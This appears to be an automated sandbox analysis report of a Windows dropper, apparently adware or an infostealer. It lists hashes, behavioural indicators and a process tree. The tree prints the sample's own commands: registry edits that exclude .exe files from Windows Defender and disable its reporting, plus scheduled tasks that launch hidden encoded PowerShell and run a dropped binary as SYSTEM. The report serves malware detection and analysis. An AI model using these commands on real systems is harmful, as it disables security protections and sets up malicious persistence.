Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
18-10-2022 19:13
Static task
static1
Behavioral task
behavioral1
Sample
089c9a7d4a37db54b685faf90b9f9869833b8376b4a472852292b3b318f04b2b.exe
Resource
win7-20220812-en
General
-
Target
089c9a7d4a37db54b685faf90b9f9869833b8376b4a472852292b3b318f04b2b.exe
-
Size
7.3MB
-
MD5
14444765d3a9c6b797dc13e1d7638015
-
SHA1
614b3ece34cfc0639d4e8ff265986a50ad8b620e
-
SHA256
089c9a7d4a37db54b685faf90b9f9869833b8376b4a472852292b3b318f04b2b
-
SHA512
4c95f3b1cbecfc1539314d32e08a7880e68c09c2a9ac68fcd8977fb8d0586823e4117b037471fb3e3827e10553a6a75c15a494d5e66b64969b55e96a13b8a4ed
-
SSDEEP
196608:91ONXlHf3ztl2mVmZXKo9jGHsowhFNMewhOOGsv01G:3ONXlHDZ8gG1WxGsGG
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 124 1988 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 4932 Install.exe 4812 Install.exe 320 XcbKATw.exe 2008 iOdOMXD.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation iOdOMXD.exe -
Loads dropped DLL 1 IoCs
pid Process 1988 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json iOdOMXD.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json iOdOMXD.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini iOdOMXD.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 iOdOMXD.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini XcbKATw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 iOdOMXD.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData iOdOMXD.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA iOdOMXD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_CD6513E45B8AAEA8DF3E8B0C926693B8 iOdOMXD.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol XcbKATw.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_CD6513E45B8AAEA8DF3E8B0C926693B8 iOdOMXD.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi iOdOMXD.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak iOdOMXD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak iOdOMXD.exe File created C:\Program Files (x86)\JyOCsvAdkzLU2\kohwANZ.xml iOdOMXD.exe File created C:\Program Files (x86)\QsEHNtqxqlZKC\ozEcTTs.dll iOdOMXD.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi iOdOMXD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja iOdOMXD.exe File created C:\Program Files (x86)\JyOCsvAdkzLU2\IFHIFMjLFTJRf.dll iOdOMXD.exe File created C:\Program Files (x86)\ExLGzlxVXqmAOBuRcxR\yPAEkKS.xml iOdOMXD.exe File created C:\Program Files (x86)\bIbJMpHiU\FIMLTR.dll iOdOMXD.exe File created C:\Program Files (x86)\bIbJMpHiU\lWfdfGp.xml iOdOMXD.exe File created C:\Program Files (x86)\ExLGzlxVXqmAOBuRcxR\fJRBcsy.dll iOdOMXD.exe File created C:\Program Files (x86)\QsEHNtqxqlZKC\oCsCUqp.xml iOdOMXD.exe File created C:\Program Files (x86)\gqlmldGVSRUn\VzJyJUN.dll iOdOMXD.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bNLHXISkhsXtOdkcGZ.job schtasks.exe File created C:\Windows\Tasks\AKVOOjzszwLKFadpj.job schtasks.exe File created C:\Windows\Tasks\bnPMwlkfsyaLVIF.job schtasks.exe File created C:\Windows\Tasks\hkqwfOswAKcVIBvce.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1648 schtasks.exe 4908 schtasks.exe 2088 schtasks.exe 3536 schtasks.exe 4280 schtasks.exe 4164 schtasks.exe 3808 schtasks.exe 3760 schtasks.exe 2116 schtasks.exe 2844 schtasks.exe 4456 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000}\NukeOnDelete = "0" iOdOMXD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000} iOdOMXD.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000}\MaxCapacity = "15140" iOdOMXD.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" iOdOMXD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix iOdOMXD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "5" iOdOMXD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" iOdOMXD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" iOdOMXD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ iOdOMXD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer iOdOMXD.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" iOdOMXD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 320 powershell.EXE 320 powershell.EXE 2144 powershell.exe 2144 powershell.exe 2880 powershell.exe 2880 powershell.exe 4040 powershell.EXE 4040 powershell.EXE 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe 2008 iOdOMXD.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 320 powershell.EXE Token: SeDebugPrivilege 2144 powershell.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 4040 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5016 wrote to memory of 4932 5016 089c9a7d4a37db54b685faf90b9f9869833b8376b4a472852292b3b318f04b2b.exe 82 PID 5016 wrote to memory of 4932 5016 089c9a7d4a37db54b685faf90b9f9869833b8376b4a472852292b3b318f04b2b.exe 82 PID 5016 wrote to memory of 4932 5016 089c9a7d4a37db54b685faf90b9f9869833b8376b4a472852292b3b318f04b2b.exe 82 PID 4932 wrote to memory of 4812 4932 Install.exe 83 PID 4932 wrote to memory of 4812 4932 Install.exe 83 PID 4932 wrote to memory of 4812 4932 Install.exe 83 PID 4812 wrote to memory of 3980 4812 Install.exe 84 PID 4812 wrote to memory of 3980 4812 Install.exe 84 PID 4812 wrote to memory of 3980 4812 Install.exe 84 PID 4812 wrote to memory of 4712 4812 Install.exe 86 PID 4812 wrote to memory of 4712 4812 Install.exe 86 PID 4812 wrote to memory of 4712 4812 Install.exe 86 PID 3980 wrote to memory of 2388 3980 forfiles.exe 88 PID 3980 wrote to memory of 2388 3980 forfiles.exe 88 PID 3980 wrote to memory of 2388 3980 forfiles.exe 88 PID 4712 wrote to memory of 4288 4712 forfiles.exe 89 PID 4712 wrote to memory of 4288 4712 forfiles.exe 89 PID 4712 wrote to memory of 4288 4712 forfiles.exe 89 PID 2388 wrote to memory of 4616 2388 cmd.exe 90 PID 2388 wrote to memory of 4616 2388 cmd.exe 90 PID 2388 wrote to memory of 4616 2388 cmd.exe 90 PID 4288 wrote to memory of 3096 4288 cmd.exe 91 PID 4288 wrote to memory of 3096 4288 cmd.exe 91 PID 4288 wrote to memory of 3096 4288 cmd.exe 91 PID 2388 wrote to memory of 3828 2388 cmd.exe 92 PID 2388 wrote to memory of 3828 2388 cmd.exe 92 PID 2388 wrote to memory of 3828 2388 cmd.exe 92 PID 4288 wrote to memory of 836 4288 cmd.exe 93 PID 4288 wrote to memory of 836 4288 cmd.exe 93 PID 4288 wrote to memory of 836 4288 cmd.exe 93 PID 4812 wrote to memory of 4456 4812 Install.exe 94 PID 4812 wrote to memory of 4456 4812 Install.exe 94 PID 4812 wrote to memory of 4456 4812 Install.exe 94 PID 4812 wrote to memory of 2088 4812 Install.exe 96 PID 4812 wrote to memory of 2088 4812 Install.exe 96 PID 4812 wrote to memory of 2088 4812 Install.exe 96 PID 320 wrote to memory of 2400 320 powershell.EXE 100 PID 320 wrote to memory of 2400 320 powershell.EXE 100 PID 4812 wrote to memory of 5084 4812 Install.exe 109 PID 4812 wrote to memory of 5084 4812 Install.exe 109 PID 4812 wrote to memory of 5084 4812 Install.exe 109 PID 4812 wrote to memory of 4164 4812 Install.exe 111 PID 4812 wrote to memory of 4164 4812 Install.exe 111 PID 4812 wrote to memory of 4164 4812 Install.exe 111 PID 320 wrote to memory of 2144 320 XcbKATw.exe 122 PID 320 wrote to memory of 2144 320 XcbKATw.exe 122 PID 320 wrote to memory of 2144 320 XcbKATw.exe 122 PID 2144 wrote to memory of 1432 2144 powershell.exe 124 PID 2144 wrote to memory of 1432 2144 powershell.exe 124 PID 2144 wrote to memory of 1432 2144 powershell.exe 124 PID 1432 wrote to memory of 2364 1432 cmd.exe 150 PID 1432 wrote to memory of 2364 1432 cmd.exe 150 PID 1432 wrote to memory of 2364 1432 cmd.exe 150 PID 2144 wrote to memory of 4460 2144 powershell.exe 149 PID 2144 wrote to memory of 4460 2144 powershell.exe 149 PID 2144 wrote to memory of 4460 2144 powershell.exe 149 PID 2144 wrote to memory of 4768 2144 powershell.exe 174 PID 2144 wrote to memory of 4768 2144 powershell.exe 174 PID 2144 wrote to memory of 4768 2144 powershell.exe 174 PID 2144 wrote to memory of 1440 2144 powershell.exe 148 PID 2144 wrote to memory of 1440 2144 powershell.exe 148 PID 2144 wrote to memory of 1440 2144 powershell.exe 148 PID 2144 wrote to memory of 3176 2144 powershell.exe 147 PID 2144 wrote to memory of 3176 2144 powershell.exe 147
Processes
-
C:\Users\Admin\AppData\Local\Temp\089c9a7d4a37db54b685faf90b9f9869833b8376b4a472852292b3b318f04b2b.exe"C:\Users\Admin\AppData\Local\Temp\089c9a7d4a37db54b685faf90b9f9869833b8376b4a472852292b3b318f04b2b.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Users\Admin\AppData\Local\Temp\7zS7525.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Users\Admin\AppData\Local\Temp\7zS7823.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2388 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4616
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3828
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4288 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3096
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:836
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goiqnwgdO" /SC once /ST 00:13:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4456
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goiqnwgdO"4⤵PID:2088
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goiqnwgdO"4⤵PID:5084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNLHXISkhsXtOdkcGZ" /SC once /ST 21:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo\poQmgQVzVdhdRIL\XcbKATw.exe\" pf /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4164
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2400
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4748
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4136
-
C:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo\poQmgQVzVdhdRIL\XcbKATw.exeC:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo\poQmgQVzVdhdRIL\XcbKATw.exe pf /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:320 -
